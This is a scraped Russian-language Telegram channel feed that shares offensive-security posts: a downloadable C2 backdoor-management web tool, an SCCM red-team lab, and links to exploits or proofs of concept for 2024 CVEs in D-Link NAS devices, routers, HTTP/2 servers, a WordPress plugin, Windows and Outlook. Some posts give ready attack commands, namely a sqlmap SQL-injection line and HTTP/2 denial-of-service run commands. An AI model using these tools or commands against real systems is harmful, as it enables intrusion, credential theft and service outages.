This media is not supported in your browser
VIEW IN TELEGRAM
как реагирует SOC на фолс позитив )))
🔥69👌5👍3😱2
C2 Cloud
веб-инфраструктура C2
*
Anywhere Access: Reach the C2 Cloud from any location.
Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
*
download
#CC
веб-инфраструктура C2
*
Anywhere Access: Reach the C2 Cloud from any location.
Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
*
download
#CC
👍13🔥2👌1
Pentes LAB - SCCM (red team tactics)
*
Часть 0х0
Часть 0х1 - Recon and PXE
Часть 0х2 - Low user
Часть 0х3 - Admin User
*
#redteam #sccm
*
Часть 0х0
Часть 0х1 - Recon and PXE
Часть 0х2 - Low user
Часть 0х3 - Admin User
*
#redteam #sccm
🔥9
CVE-2024-3273
*
D-Link NAS версии:
Exploit + Tool
#dlink #exploit #NAS
*
D-Link NAS версии:
DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
DNS-325 Version 1.01
DNS-327L Version 1.09, Version 1.00.0409.2013
DNS-340L Version 1.08
Exploit + Tool
#dlink #exploit #NAS
🔥14
CVE-2024-29269
*
Маршрутизаторы
*
Хантер показывает что есть 3307 девайсов
*
POC exploit
*
Маршрутизаторы
TELESQUARE TLR-2005KSH уязвимы для неаутентифицированных команд*
Хантер показывает что есть 3307 девайсов
*
POC exploit
🔥17👍1
CVE-2024-27316 Атака на http/2
*
Подробности уязвимости
*
Конкретно
CVE-2024-30255 (untested)
CVE-2024-31309 (untested)
CVE-2024-28182 (untested)
CVE-2024-2653 (untested)
CVE-2024-27919 (untested)
*
Usage:
*
POC exploit
*
Подробности уязвимости
*
Конкретно
CVE-2024-27316 влияет на другие CVE:CVE-2024-30255 (untested)
CVE-2024-31309 (untested)
CVE-2024-28182 (untested)
CVE-2024-2653 (untested)
CVE-2024-27919 (untested)
*
Usage:
go build
./cve-2024-27316 -t 127.0.0.1:80 -p http -i 8192
./cve-2024-27316 -t 127.0.0.1:443 -p https -i 8192*
POC exploit
🔥13
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
#wordpress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
🔥20
CVE-2023-36047
*
Дырка в службе
ЗаБагФиксили только часть операции копирования, а операция чтения все еще выполняелась в контексте NT AUTHORITY\\SYSTEM. Эту уязвимость можно использовать для получения
Патч уже есть и уязвимость отслеживается как
*
Exploit
#windows #eop
*
Дырка в службе
usermanager, которая копировала файлы из каталога, управляемого пользователем, что приводило к Elevation of Privilege. ЗаБагФиксили только часть операции копирования, а операция чтения все еще выполняелась в контексте NT AUTHORITY\\SYSTEM. Эту уязвимость можно использовать для получения
SAM /SYSTEM/SECURITY из теневой копии. Патч уже есть и уязвимость отслеживается как
CVE-2024-21447*
Exploit
#windows #eop
👍10🔥1👌1
CVE-2024-21378 Microsoft Outlook Remote Code Execution
*
Описание работы внутри файла
*
POC exploit
#outlook #exploit
*
Описание работы внутри файла
*
POC exploit
#outlook #exploit
🔥14😱6👍3